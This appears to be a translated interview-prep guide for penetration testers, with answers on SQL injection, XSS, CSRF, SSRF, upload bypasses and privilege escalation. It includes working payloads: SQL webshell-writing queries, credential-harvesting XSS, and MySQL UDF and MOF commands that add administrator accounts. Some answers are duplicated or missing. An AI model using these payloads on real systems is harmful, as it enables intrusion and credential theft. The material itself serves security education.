Summary of penetration testing interview questions (with analysis of answers + supporting materials)

Note: All the materials have been compiled into PDFs, and the interview questions and answers will be updated continuously, because it is impossible to cover all interview questions anyway.

1. Idea flow

1. Information collection

a. Information about the server (real ip, system type, version, open port, WAF, etc.)

b. Website fingerprinting (including cms, cdn, certificate, etc.), dns records

c. whois information, name, filing, email, phone back check (mailbox lost in social worker database, social worker preparation, etc.)

e. Collection of subdomain names, side stations, segment C, etc.

f. Google hacking targeted search, pdf files, middleware version, weak password scanning, etc.

g. Scan the website directory structure, burst background, website banner, test files, backup and other sensitive files leakage, etc.

h. Transmission protocol, common vulnerabilities, exp, github source code, etc.

2. Vulnerability mining

a. Browse the website to see its scale, functions, characteristics, etc.

b. Scan ports, weak passwords, directories, etc., and perform vulnerability detection on the corresponding ports, such as rsync, bleeding heart, mysql, ftp, ssh weak passwords, etc.

c. XSS, SQL injection, upload, command injection, CSRF, cookie security detection, sensitive information, communication data transmission, brute force cracking, arbitrary file upload, unauthorized access, unauthorized access, directory traversal, file inclusion, replay attack (SMS bombing), server vulnerability detection, and finally use missing scanning tools, etc.

3. Vulnerability Exploitation & Privilege Escalation

a. mysql privilege escalation, serv-u privilege escalation, oracle privilege escalation

b. Windows overflow privilege escalation

c, linux dirty cow, kernel vulnerability escalation e

4. Clear test data & output report

Clean up and summarize logs and test data
, output a penetration test report, and attach a repair plan

5. Retest

Verify and discover new vulnerabilities, output reports, archive

Two, the problem

1. When you get a station to be tested, what do you think should be done first?

• collect message

a. Obtain the whois information of the domain name, obtain the registrant's email address, name and phone number, etc., throw it into the social worker database to see if there is any leaked password, and then try to log in to the background with the leaked password. Use the email address as a keyword to throw it into the search engine. Use the searched associated information to find out other email addresses and get common social accounts. Social workers find social accounts, which may find out the administrator's habit of setting passwords. Use existing information to generate a special dictionary.

b. Query server side sites and sub-domain sites, because the main site is generally more difficult, so first check if there are any common cms or other loopholes in the side sites.

c. Check the server operating system version and web middleware to see if there are known vulnerabilities, such as IIS, APACHE, NGINX parsing vulnerabilities

d. Check the IP, scan the IP address port, and detect the vulnerability of the corresponding port, such as rsync, bleeding heart, mysql, ftp, ssh weak password, etc.

e. Scan the website directory structure to see if you can traverse the directory, or leak sensitive files, such as php probe
f, google hack to further detect website information, background, sensitive files

• vulnerability scan

Start to detect vulnerabilities, such as XSS, XSRF, sql injection, code execution, command execution, unauthorized access, directory reading, arbitrary file reading, downloading, file inclusion, remote command execution, weak passwords, uploading, editor vulnerabilities, brute force cracking wait

• exploit

Use the above methods to get webshell, or other permissions

• privilege escalation

Privilege escalation server, such as udf privilege escalation of mysql under windows, serv-u privilege escalation, vulnerabilities of lower versions of windows, such as iis6, pr, Brazilian barbecue, linux dirty cow vulnerability, linux kernel version vulnerability escalation of privilege, mysql system under linux Privilege escalation and oracle low privilege escalation

• log cleanup

• Summary report and repair plan

2. What is the significance of judging the CMS of the website for penetration?

Find program vulnerabilities that have been exposed on the Internet.

If it is open source, you can also download the corresponding source code for code auditing.

3. For a mature and relatively safe CMS, what is the meaning of scanning the directory when infiltrating?

Sensitive files, secondary directory scanning

Misoperations by the webmaster, such as: the compressed files of the website backup, description.txt, and the secondary directory may store other sites

4. Common web server containers.

IIS、Apache、nginx、Lighttpd、Tomcat

5. Mysql injection point, use the tool to directly write a sentence to the target station, what conditions are required?

root permissions and the absolute path of the website.

6. Which versions of containers are currently known to have parsing vulnerabilities, with specific examples.

a. IIS 6.0
/xx.asp/xx.jpg "xx.asp" is the folder name

b. Fast-CGI is enabled by default in IIS 7.0/7.5
. Enter /1.php directly after the image address in the url, and the normal image will be parsed as php

c. The Nginx
version is less than or equal to 0.8.37, and the exploit method is the same as that of IIS 7.0/7.5, and it can also be exploited when Fast-CGI is disabled. Null byte code xxx.jpg.php

d. The file uploaded by Apache is named: test.php.x1.x2.x3, and Apache judges the suffix from right to left

e. lighttpd xx.jpg/xx.php, incomplete, please feel free to add in the comments, thank you!

7. How to manually quickly judge whether the target station is a windows server or a linux server?

Linux is case sensitive, windows is not case sensitive.

8. Why is there only one port 80 open for a mysql database station?

Changed the port, it didn't scan out.

Station library separation.

Port 3306 is not open to the outside world

9. Several situations where 3389 cannot connect

Port 3389 is not open.
The port is modified.
Protection and interception.
It is in the internal network (port forwarding is required)

10. How to escape characters during breakthrough injection?

Wide character injection
hex encoding bypass

11. What should I do first when I see an editor on a background news editing interface?

Look at the name version of the editor, then search for open vulnerabilities.

12. Get a webshell and find that there is a .htaccess file in the root directory of the website. What can we do?

There are many things that can be done, use the hidden net horse as an example:
insert

<FilesMatch “xxx.jpg”> SetHandler application/x-httpd-php

.jpg files are parsed into .php files.

It’s hard to go into details about other specific things. It is recommended that you search for sentences by yourself.

13. Injection vulnerability can only check the account password?

As long as the authority is wide, drag the library to get old.

14. Will SafeDog track variables to find out that it is a one-sentence Trojan horse?

It is based on the feature code, so it is easy to bypass, as long as you have a broad mind, you can go around the dog to the point of joy, but this should not be static.

15. Access scans out the database files with the suffix asp, and accesses garbled characters. How to realize local use?

Thunder download, directly change the suffix to .mdb.

16. Choose a readable and writable directory when escalating rights, why try not to use directories with spaces?

Because most exp executions require spaces to define parameters

17. A server has sites A and B, why add a test user in the background of A to access the background of B. Found that the test user was also added?

Same database.

18. Can I start the injection directly by ordering without using and or or or xor when injecting?

and/or/xor, the previous 1=1, 1=2 steps are just to judge whether it is an injection point. If it is already determined to be an injection point, then you can save that step.

19: An anti-injection system will prompt when injecting:

The system has detected that you have illegal injection behavior.
Your ip xx.xx.xx.xx has been recorded
Time: 2016:01-23
Submit page: test.asp?id=15
Submit content: and 1=1

20. How to use this anti-injection system to get the shell?

Submit a sentence directly in the URL, so that the website will also record your sentence into the database file. At this time, you can try to find the configuration file of the website and directly link it to the kitchen knife.

21. When accessing garbled characters after uploading to Malaysia, what are the solutions?

Change the encoding in the browser.

22. What is the point of inspecting the elements of the upload point?

The limitation of the uploaded file type of some sites is implemented on the front end, and at this time, as long as the upload type is increased, the limitation can be broken.

23. The target site prohibits registered users, just enter the user name in the password recovery area and prompt: "This user does not exist", how do you think this is used?

First blast the username, and then use the blasted username to blast the password.
In fact, some sites will also prompt in this way at the login.
All places that interact with the database may have injections.

24. The target station finds that the download address of a txt is

http://www.test.com/down/down.php?file=/upwdown/1.txt, what do you think?

This is the legendary download bug! After file=, try to enter index.php to download his homepage file, and then continue to search the configuration files of other websites in the homepage file, you can find out the website's database password and database address.

25. A gives you a target station, and tells you that there is a /abc/ directory under the root directory, and there are editor and admin directories under this directory. What are your thoughts?

Scan sensitive files and directories directly under the website's secondary directory /abc/.

26. In the case of a shell, how to use xss to achieve long-term control of the target station?

Add a section of js to record the login account password at the background login, and judge whether the login is successful. If the login is successful, record the account password in a file with an uncommon path or send it directly to your own website file. (This method is suitable for valuable networks that require deep control permissions).

Insert XSS scripts in files that are only accessible after login.

27. At the place where the administrator password is modified in the background, the original password is displayed as *. How do you think it will be possible to read out the user's password?

Review the element and change the password attribute at the password to text to display it in plain text

28. There is no protection on the target station, uploading pictures can be accessed normally, but uploading script format access will result in 403. What is the reason?

There are many reasons. It is possible that the web server configuration writes the upload directory to death and does not execute the corresponding script. Try changing the suffix name to bypass

29. Check the element to know the protection software used by the website, how do you think it is done?

When sensitive operations are blocked and the protection cannot be determined through the interface information, F12 can see the content in the name of the HTML body such as Patronus.

30. What is the purpose of creating a .zhongzi folder in the win2003 server?

Hidden folder, in order to prevent the administrator from discovering the tools you uploaded.

31. SQL injection has the following two test options, choose one and explain the reasons for not choosing the other:

A. demo.jsp?id=2+1
B. demo.jsp?id=2-1
choose B, in URL encoding, + represents a space, which may cause confusion

32. There is a sql injection vulnerability in the following link. What do you think about this deformed injection?

demo.do?DATA=AjAxNg==
DATA may be base64 encoded and then sent to the server, so we also need to base64 encode the parameters to complete the test correctly

33. Found the injection point of demo.jsp?uid=110, what kind of ideas do you have to obtain the webshell, which one is the best?

If you have write permission, use using INTO OUTFILE to construct a joint query statement to redirect the output of the query to a system file, so that you can write it into WebShell. Use sqlmap –os-shell The principle is the same as the one above to directly obtain a Shell, which is more efficient. Get the account and password of the website administrator by constructing a joint query statement, then scan the background to log in to the background, and then upload the Shell in the background by changing the package and uploading.

34. What is the difference between CSRF, XSS and XXE, and how to fix them?

XSS is a cross-site scripting attack. Codes can be constructed in the data submitted by users to execute, so as to realize attacks such as stealing user information. Repair method: escape character entities, use HTTP Only to prohibit JavaScript from reading cookie values, verify input, and use the same character encoding for browsers and web applications.

CSRF is a cross-site request forgery attack. XSS is one of many means to realize CSRF. It is because there is no confirmation whether the key operation is initiated by the user voluntarily. Repair method: filter out the pages that need to be protected against CSRF and then embed Token, enter the password again, and verify that Referer XXE is an XML external entity injection attack. In XML, entities can be called to request local or remote content. Similar to remote file protection, it will cause related Security concerns, such as sensitive file reading. Repair method: The XML parsing library strictly prohibits the parsing of external entities when it is called.

35. What is the difference between CSRF, SSRF and replay attacks?

CSRF is a cross-site request forgery attack, SSRF initiated by the client is a server-side request forgery, and a replay attack initiated by the server is to replay the intercepted data packets to achieve identity authentication and other purposes

36. Name at least three business logic vulnerabilities and how to fix them?

The password retrieval vulnerability exists in

1) The password allows brute force cracking,

2) There is a general-purpose retrieval certificate,

3) You can skip the verification step,

4) To retrieve the certificate, you can block the package to obtain it

To get the password through the password retrieval function provided by the manufacturer. The most common of authentication vulnerabilities are

1) Session fixation attack

2) Cookie phishing

As long as you get Session or Cookie, you can forge user identity. Captcha vulnerability exists in

1) Captcha allows brute force cracking

2) The verification code can be bypassed by Javascript or by changing the package

37. Circle the items that may have problems in the following conversations, and mark the possible problems?

get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”
HTTP/1.1Host:.com:82User-Agent:Mozilla/
5.0 Firefox/40Accept:text/css,/;q=0.1
Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer:http://****.com/eciop/orderForCC/
cgtListForCC.htm?zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI-NX01VPUF46W;
status=True
Connection:keep-alive

If you have write permission, use using INTO OUTFILE to construct a joint query statement to redirect the output of the query to a system file, so that you can write it into WebShell. Use sqlmap –os-shell The principle is the same as the one above to directly obtain a Shell, which is more efficient. Get the account and password of the website administrator by constructing a joint query statement, then scan the background to log in to the background, and then upload the Shell in the background by changing the package and uploading.

38. Give you a website. How do you do a penetration test? Under the premise of obtaining written authorization.

39, sqlmap, how to inject an injection point?

1) If it is a get model, directly, sqlmap -u "such as point URL".
2) If it is a post type such as point, you can use sqlmap -u "injection point URL" --data="post parameter"
3) If it is a cookie , X-Forwarded-For, etc., when you can access it, use burpsuite to capture the packet, replace the injection site with a number, put it in the file, and then sqlmap -r "file address"

40. nmap, several ways to scan

41. How many types of sql injection?

1) Error injection
2) Bool type injection
3) Delay injection
4) Wide byte injection

42. What are the functions for error injection? 10

1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2）通过floor报错 向下取整
3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4）.geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));
5）.multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
6）.polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
7）.multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
8）.linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
9）.multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
10）.exp()select from test where id=1 and exp(~(select * from

43. How to judge the delayed injection?

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

44. What do blind injection and delayed injection have in common?

It is a character-by-character judgment

45. How to get the webshell of a website? Upload, edit templates in the background, sql injection write files, command execution, code execution, some cms vulnerabilities have been exposed, such as dedecms background can directly create script files, wordpress upload plug-in contains script files zip archives, etc.

46. ​​What are the functions of sql injection to write files?

select 'one sentence' into outfile 'path'
select 'one sentence' into dumpfile 'path'
select '' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

47. How to prevent CSRF?

1) Verify referer
2) Verify token
details: CNode: Node.js Professional Chinese Community

48. What are the owasp vulnerabilities?

1) SQL injection protection methods:
2) Invalid identity authentication and session management
3) Cross-site scripting attack XSS
4) Direct reference to unsafe objects
5) Security configuration errors
6) Sensitive information leakage
7) Lack of functional-level access control
8 ) Cross Site Request Forgery CSRF
9) Using components with known vulnerabilities
10) Unvalidated redirects and forwards

49. SQL injection protection method?

1) Use a secure API
2) Escape the input special characters
3) Use a whitelist to standardize the input verification method
4) Control the client input and do not allow the input of special characters related to SQL injection
5) Server side Filter, escape, replace, and delete special characters before submitting to the database for SQL queries.

50. What are the functions of code execution, file reading, and command execution?

1) Code execution:

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

2) File read:

file_get_contents(),highlight_file(),fopen(),read
file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

3) Command execution:

system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

51. In addition to the onerror attribute of the img tag, is there any other way to obtain the administrator path?

src specifies a remote script file to get referer

52. In addition to the onerror attribute of the img tag, and the suffix name of the src attribute must end with .jpg, how to get the administrator path.

1) The remote server modifies the apache configuration file and configures the .jpg file to parse AddType application/x-httpd-php .jpg in php

53. Why does the aspx Trojan have greater authority than asp?

Aspx uses .net technology. IIS does not support it by default, and ASP is just a scripting language. When invading, the Trojan horse of ASP generally has the guest authority... The Trojan horse of APSX generally has the user authority.

54. How to bypass waf?

Case conversion method
Interfering characters/!/
encoding base64 unicode hex url ascll multiple
parameters

55. How to write webshell to the server?

Various upload vulnerabilities
mysql has write permission, use sql statement to write shell
http put method

56. Common ports in penetration testing

a. Web class (web vulnerability/sensitive directory) third-party common component vulnerability struts thinkphp jboss ganglia zabbix

80 web
80-89 web
8000-9090 web

b. Database class (scan for weak passwords)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

c. Special service class (unauthorized/command execution class/vulnerability)

443 SSL心zang滴血
873 Rsync未授权
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授权
7001,7002 WebLogic默认弱口令，反序列
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问

d. Commonly used port types (scanning weak passwords/port blasting)

21 ftp
22 SSH
23 Telnet
2601,2604 zebra路由，默认密码zebra
3389 远程桌面

ALL, total port details

21 ftp
22 SSH
23 Telnet
80 web
80-89 web
161 SNMP
389 LDAP
443 SSL心zang滴血以及一些web漏洞测试
445 SMB
512,513,514 Rexec
873 Rsync未授权
1025,111 NFS
1433 MSSQL
1521 Oracle:(iSqlPlus Port:5560,7778)
2082/2083 cpanel主机管理系统登陆 （国外用较多）
2222 DA虚拟主机管理系统登陆 （国外用较多）
2601,2604 zebra路由，默认密码zebra
3128 squid代理默认端口，如果没设置口令很可能就直接漫游内网了
3306 MySQL
3312/3311 kangle主机管理系统登陆
3389 远程桌面
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网
6379 redis未授权
7001,7002 WebLogic默认弱口令，反序列
7778 Kloxo主机控制面板登录
8000-9090 都是一些常见的web端口，有些运维喜欢把管理后台开在这些非80的端口上
8080 tomcat/WDCP主机管理系统，默认弱口令
8080,8089,9090 JBOSS
8083 Vestacp主机管理系统 （国外用较多）
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
28017 mongodb统计页面
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问

3. On the side of a security vendor

了解哪些漏洞

文件上传有哪些防护方式

用什么扫描端口，目录

如何判断注入

注入有防护怎么办

有没有写过tamper

3306 1443 8080是什么端口

计算机网络从物理层到应用层xxxx

有没有web服务开发经验

如何向服务器写入webshell

有没有用过xss平台

网站渗透的流程

mysql两种提权方式（udf，？）

常见加密方式xxx

ddos如何防护

有没有抓过包，会不会写wireshark过滤规则

清理日志要清理哪些

4. SQL injection protection

1. Use safe API
2. Escape the input special characters
3. Use the whitelist to standardize the input verification method
4. Control the client input and do not allow the input of special characters related to SQL injection
5. Server side Filter, escape, replace, and delete special characters before submitting to the database for SQL queries.
6. Standard encoding and character set

Five, why parameterized query can prevent SQL injection

principle:

Using parameterized query database server will not execute the content of the parameter as part of the sql command, it will run with the parameter after the database completes the compilation of the sql command

Simply put: The reason why parameterization can prevent injection is that a statement is a statement, a parameter is a parameter, and the value of a parameter is not part of the statement. The database only runs according to the semantics of the statement.

6. SQL header injection point

UA
REFERER
COOKIE
IP

7. What is the blind bet? How blind?

Blind injection means that during the SQL injection attack, the server turns off the error echo. We simply judge whether there is SQL injection and exploit it by the change of the content returned by the server. There are two methods of blind injection. One is to verify whether there is injection by checking whether the returned content of the page is correct (boolean-based). One is to judge whether there is injection (time-based) through the difference in the processing time of SQL statements. Here, you can use benchmark, sleep and other functions that cause delay effects, or you can construct a joint query table with a large Cartesian product. To achieve the purpose of delay.

8. The principle and root cause of wide byte injection

1. Generation principle

In the case that the database uses a wide character set and this problem is not considered in the WEB, at the WEB layer, since 0XBF27 is two characters, when the addslash and magic_quotes_gpc are enabled in PHP, the 0x27 single quote will be escaped, so 0xbf27 will become 0xbf5c27, and when the data enters the database, because 0XBF5C is another character, the \ escape symbol will be "eaten" by the previous bf, and the single quotation marks can be escaped from this and can be used to close the statement.

2. Where to code

3. Root cause

character_set_client (the character set of the client) and character_set_connection (the character set of the connection layer) are different, or conversion functions such as iconv and mb_convert_encoding are used improperly.

4. Solutions

Unify the character sets used by databases, web applications, and operating systems to avoid differences in parsing. It is best to set them to UTF-8. Or properly escape the data, such as the use of mysql_real_escape_string+mysql_set_charset.

5. How to use only update in SQL

First understand this SQL

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

Injection is achieved if this SQL is modified to

a. Modify the homepage value to http://xxx.net', userlevel='3

Then the SQL statement becomes

UPDATE user SET password='mypass', homepage='http://xxx.net', userlevel='3' WHERE id='$id'

userlevel is the user level

b. Modify the password value to mypass)' WHERE username='admin'#

Then the SQL statement becomes

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

c. After modifying the id value to 'OR username='admin', the SQL statement becomes

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

Nine, how to write SQL shell / what to do if the single quote is filtered

Write shell: root authority, GPC off, know the file path outfile function

http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY '<?php phpinfo(); ?>'

http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'

wide byte injection

1. The method of replacing spaces

%0a, %0b, %a0 etc.
/**/ etc. comment characters
<>

2. Mysql website injection, what is the difference between above 5.0 and below 5.0

Below 5.0, there is no information_schema system table, and it is impossible to list names, etc., and can only violently run table names.

Below 5.0 is multi-user single operation, and above 5.0 is multi-user multi-operation.

10. XSS

1. Principle of XSS

reflective

Codes can be constructed in the data submitted by users for execution, so as to realize attacks such as stealing user information. Users need to be tricked into "clicking" a malicious link in order for the attack to succeed

storage type

Stored XSS will "store" the data entered by the user on the server side. This kind of XSS has strong stability.

DOM type

XSS formed by modifying the DOM nodes of the page is called DOM Based XSS.

2. The difference between DOM type and reflection type

Reflected XSS: By inducing users to click, the malicious payload we constructed will trigger XSS. Reflective XSS detection Every time we request a link with a payload, the page should have specific malformed data. DOM type: XSS formed by modifying the DOM nodes of the page. DOM-based XSS is the XSS generated by dom operation through js code, so we may not even get the corresponding malformed data in the response of the request. The fundamental difference seems to me to be the difference in the output point.

3. DOM type and XSS automated testing or manual testing

Manual testing ideas: Find function points like document.write, innerHTML assignment, outerHTML assignment, window.location operation, writing javascript: post-content, eval, setTimeout, setInterval, etc. to execute directly. Find its variables, trace back to the source of the variables to see if they are controllable, and whether they have passed through the security function. For automated testing, please refer to Brother Dao’s blog. The idea is to start from the input, observe the process of variable transmission, and finally check whether there is output in the dangerous function and whether there is a safe function in the middle. But this requires a javascript parser, otherwise some content brought in through js execution will be missed.

When answering this question, since the usual detection of customers is basically based on the functions of different function points plus experience and intuition, the different types of XSS detection methods are actually not too subdivided and standardized. The detection method, so the answer sucks. . .

4. How to quickly find the XSS location

5. Suggestions on how to fix XSS

Input point check: check the legality of the data entered by the user, use filter to filter sensitive characters or code escape, and check the format of specific types of data. Checks against input points are best implemented on the server side.

Output point check: When the variable is output to the HTML page, the output content is coded and escaped. When the variable is output in HTML, it is HTMLEncoded. If it is output in the Javascript script, it is JavascriptEncoded. Put the variables that use JavascriptEncode in quotation marks and escape dangerous characters, so the data part cannot escape from the quotation marks and become part of the code. You can also use a more restrictive approach, using hexadecimal encoding for all non-alphanumeric characters. In addition, it should be noted that in browsers, HTML parsing will be prioritized over Javascript parsing, and the encoding method also needs to be considered carefully. For different output points, our methods of defending against XSS may be different, which may be discussed in future articles Make a summary.

In addition, there is HTTPOnly to limit Cookie hijacking.

6. Production conditions of XSS worms

Under normal circumstances, one is that the page that generates the XSS point does not belong to the self page, and the page that generates interactive behavior between users may cause the generation of XSS Worm.
Stored XSS is not necessarily required

11. CSRF

1. Principle of CSRF

CSRF is a cross-site request forgery attack, initiated by the client, because there is no confirmation whether the user voluntarily initiates when the key operation is executed

2. Defense

Verify Referer
add token

3. Make a horizontal comparison between the token and the referer, who has the highest security level?

The security level of the token is higher, because not any server can obtain the referer, and if it jumps from HTTPS to HTTP, the referer will not be sent. And the referer can be customized in some versions of FLASH. But for the token, it must be random enough and not leakable. (principle of unpredictability)

4. From what point of view to verify the referer? If so, how to prevent the problem

For the verification of the referer in the header, one is an empty referer, and the other is an imperfect referrer filtering or detection. In order to prevent this kind of problem, in the verification white list, regular rules should be well written.

5. For the token, which aspect will be paid attention to in the token test, and which aspect of the token will be tested?

To quote an answer from a senior:

The attack on the token, one is the attack on itself, the replay test is one-time, the encryption rules are analyzed, whether the verification method is correct, etc., and the other is the acquisition of it combined with the information leakage vulnerability, combined with the launch of a combined attack. Information leakage is
possible It is cache, log, get, and it is also possible to use cross-site.
Many jump logins rely on tokens. There is a jump loophole and reflective cross-site that can be combined into login hijacking.
In addition, tokens can also be described in combination with other services. How can it be bypassed if the security and design are not good, such as grabbing red envelopes and the like

11. SSRF

SSRF (Server-Side Request Forgery: Server-side request forgery) is a security hole constructed by an attacker to form a request initiated by the server. Typically, SSRF attacks target internal systems that are inaccessible from the external network. (Because it is initiated by the server, it can request the internal system connected to it but isolated from the external network)

Most of the reasons for the formation of SSRF are that the server provides the function of obtaining data from other server applications without filtering and restricting the target address. For example, get the text content of the web page from the specified URL address, load the picture at the specified address, download it, and so on.

1. Monitoring

Verification method of SSRF vulnerability:

1) Because the SSRF vulnerability is a security vulnerability that allows the server to send requests, we can analyze whether the sent request is sent by the server by capturing packets to determine whether there is an SSRF vulnerability

2) Find the accessed resource address in the page source code. If the resource address type is www.baidu.com/xxx.php?image=(address), there may be SSRF vulnerability 4[1]

2. The cause defense bypass of SSRF vulnerability

Cause: The simulated server makes requests to other server resources without legality verification. Exploitation: Construct a malicious intranet IP for detection, or use other supported protocols to attack other services. Defense: Prohibition of jumping, restriction of protocol, restriction of internal and external network, and restriction of URL. Bypass: use different protocols, bypass for IP, IP format, add other characters for URL, malicious URL, @ and the like. 301 redirect + dns rebinding.

12. Upload

1. The principle of file upload vulnerability

Due to the lack of control or processing defects in the part of the user's file upload by the programmer, the user can upload the executable dynamic script file to the server beyond its own authority

2. Common upload bypass methods

Front-end js verification: disable js/burp to change package
, case
, double suffix,
filter bypass pphphp->php

3. Protection

The file upload directory is set to be non-executable
Use a whitelist to determine the file upload type
Rewrite the file name and path with random numbers

4. What is the point of reviewing the elements of the upload point?

The limitation of the uploaded file type of some sites is implemented on the front end, and at this time, as long as the upload type is increased, the limitation can be broken.
Thirteen, the file contains

1. Principle

Introduce a script or code that can be controlled by the user, and let the server execute functions such as include() to import the files that need to be included through dynamic variables; the user can control
the dynamic variables.

2. The function that causes the file to contain

PHP：include(), include_once(), require(), re-quire_once(), fopen(), readfile(), … JSP/Servlet：ava.io.File(), java.io.Fil-eReader(), … ASP：include file, include virtual,

3. The local file contains

Vulnerabilities that can open and include local files are known as local file inclusion vulnerabilities

14. Logic loopholes

1. Common logic loopholes in the financial industry

For financial business only, it is mainly data tampering (involving financial data, or judgment data of some businesses), competition conditions or improper design, leakage of transaction/order information, and unauthorized viewing or malicious operation of other people’s accounts , the transaction or business step is bypassed.

15. Man-in-the-middle attack

A man-in-the-middle attack is a (lack of) mutual authentication attack; a vulnerability caused by the lack of mutual authentication between the client and server during the SSL handshake

Solutions to defend against man-in-the-middle attacks are usually based on the following technologies

1. Public key infrastructure PKI uses the PKI mutual authentication mechanism, the client verifies the server, and the server verifies the client; in the above two examples, only the server is verified, which causes a loophole in the SSL handshake link, and if mutual authentication is used Basically, stronger mutual authentication

2. Latency test

Computations using complex cryptographic hash functions result in delays of tens of seconds; if both parties typically take 20 seconds to compute, and the entire communication takes 60 seconds to compute to reach the other party, this could indicate the presence of a third-party intermediary.

3. Use other forms of key exchange

ARP spoofing

principle

Each host has an ARP cache table, which records the correspondence between IP addresses and MAC addresses, and LAN data transmission relies on MAC addresses. There is a defect in the ARP cache table mechanism, that is, when the requesting host receives the ARP response packet, it will not verify whether it has sent an ARP request packet to the other host, and directly compare the IP address in the return packet with the MAC address. The relationship is stored in the ARP cache table. If the original IP correspondence is the same, the original one will be replaced. In this way, the attacker has the possibility to eavesdrop on the data transmitted by the host.
Protection

1. Bind the gateway MAC and IP address to the host as static (the default is dynamic), command: arp -s gateway IP gateway MAC

2. Bind the host MAC and IP address on the gateway

3. Use ARP firewall

Sixteen, DDOS

1. DDOS principle

Using reasonable requests to cause resource overload, resulting in service unavailability

The principle of syn torrent

Forge a large number of source IP addresses and send a large number of SYN packets to the server. At this time, the server will return a SYN/ACK packet. Because the source address is forged, the forged IP will not respond, and the server will not receive the forgery. The IP response will retry 3 to 5 times and wait for a SYNTime (usually 30 seconds to 2 minutes). If it times out, the connection will be discarded. If the attacker sends a large number of SYN requests with forged source addresses, the server will consume a lot of resources (CPU and memory) to process this semi-connection, and will continue to retry SYN+ACK on these IPs. The final result is that the server has no time to pay attention to normal connection requests, resulting in a denial of service.

CC attack principle

Continuously initiate normal requests to some application pages that consume large resources to achieve the purpose of consuming server resources.

2. DOSS protection

SYN Cookie/SYN Proxy, safereset and other algorithms. The main idea of ​​SYN Cookie is to assign a "Cookie" to each IP address and count the visit frequency of each IP address. If a large number of data packets from the same IP address are received in a short period of time, it is considered to be under attack, and then the packets from this IP address will be discarded.

17. Elevation of rights

Two ways to escalate privileges in MySQL

udf privilege escalation, mof privilege escalation

MySQL_UDF extraction

Requirements: 1. The target system is Windows (Win2000, XP, Win2003); 2. Have a user account of MYSQL, this account must have insert and delete permissions to mysql to create and discard functions 3. Have a root account password to export udf : For MYSQL 5.1 and above, you must put the udf.dll file in the lib\plugin folder in the MYSQL installation directory to create custom functions. You can enter select @@basedirshow variables like '%plugins%' in mysql to find mysql installation Path privilege escalation:

Create functional functions using SQL statements. Syntax: Create Function function name (the function name can only be one of the following list) returns string soname 'exported DLL path';

create function cmdshell returns string soname ‘udf.dll’
select cmdshell(‘net user arsch arsch /add’);
select cmdshell(‘net localgroup administrators arsch /add’);

drop function cmdshell;

This directory does not exist by default, so we need to use webshell to find the MYSQL installation directory, create a lib\plugin folder in the installation directory, and then export the udf.dll file to this directory.

MySQL mof privilege escalation

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name  = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";
};

instance of __FilterToConsumerBinding
{
Consumer   = $Consumer;
Filter = $EventFilter;
};

The command on line 18, please change it yourself before uploading.

2. Execute load_file and into dumpfile to export the file to the correct location.

select load file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mov’

After the execution is successful, you can add an ordinary user, then you can change the command, and then upload and export the execution to upgrade the user to administrator privileges, and then the 3389 connection is ok.

18. Special Vulnerabilities

1、Struts2-045

2. Redis unauthorized
reason

By default, Redis is bound to 0.0.0.0:6379, which will expose the Redis service to the public network. If authentication is not enabled, any user can access the target server without authorization. Redis and read Redis data. Attackers can use related methods of Redis without authorization to access Redis, and can successfully write the public key on the Redis server, and then use the corresponding private key to directly log in to the target server. Utilization conditions and methods
Conditions
:

a. Redis service runs as root account
b. Redis has no password or weak password for authentication
c. Redis listens on the 0.0.0.0 public network
Method:

a. Through the INFO command of Redis, you can view the server-related parameters and sensitive information, paving the way for the attacker's subsequent infiltration b.
Upload the SSH public key to obtain SSH login permission
